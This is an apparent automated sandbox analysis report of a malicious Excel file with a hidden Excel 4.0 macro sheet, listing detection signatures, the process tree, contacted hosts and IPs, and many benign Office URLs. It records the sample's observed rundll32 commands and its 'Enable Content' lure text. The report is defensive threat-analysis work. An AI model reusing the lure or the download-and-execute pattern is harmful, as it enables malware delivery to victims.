Loading ...

Play interactive tourEdit tour

Analysis Report 8100c344_by_Libranalysis.xls

Overview

General Information

Sample Name:8100c344_by_Libranalysis.xls
Analysis ID:412222
MD5:8100c34499827f8ba4a0c69872cd2205
SHA1:4c7ee8ed850c211c66102389a65b0757018d1168
SHA256:abb73bd58ba634f647ed144b998f9a829c69ad6410011a42147311459ed563e4
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6932 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4700 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6028 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6932, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 4700

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49738 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.aadrm.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.cortana.ai
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.office.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.onedrive.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://augloop.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://augloop.office.com/v2
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cdn.entity.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://clients.config.office.net/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://config.edge.skype.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cortana.ai
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cortana.ai/api
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://cr.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dev.cortana.ai
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://devnull.onenote.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://directory.services.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://graph.windows.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://graph.windows.net/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://lifecycle.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://login.windows.local
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://management.azure.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://management.azure.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://messaging.office.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ncus.contentsync.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://officeapps.live.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://onedrive.live.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://outlook.office.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://outlook.office365.com/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://powerlift.acompli.net
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://settings.outlook.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://staging.cortana.ai
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://tasks.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://webshell.suite.office.com
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://wus2.contentsync.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: BFE22172-59BF-4A95-AA18-3650190CBF48.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49738 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13 Once You have Enable Editing, plee T
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT ? W You are using iOS or
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 8100c344_by_Libranalysis.xlsInitial sample: CALL
Source: 8100c344_by_Libranalysis.xlsInitial sample: CALL
Source: 8100c344_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 8100c344_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 8100c344_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/7@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{765CB870-138F-4FBD-9C99-DF1A0E1974DB} - OProcSessId.datJump to behavior
Source: 8100c344_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
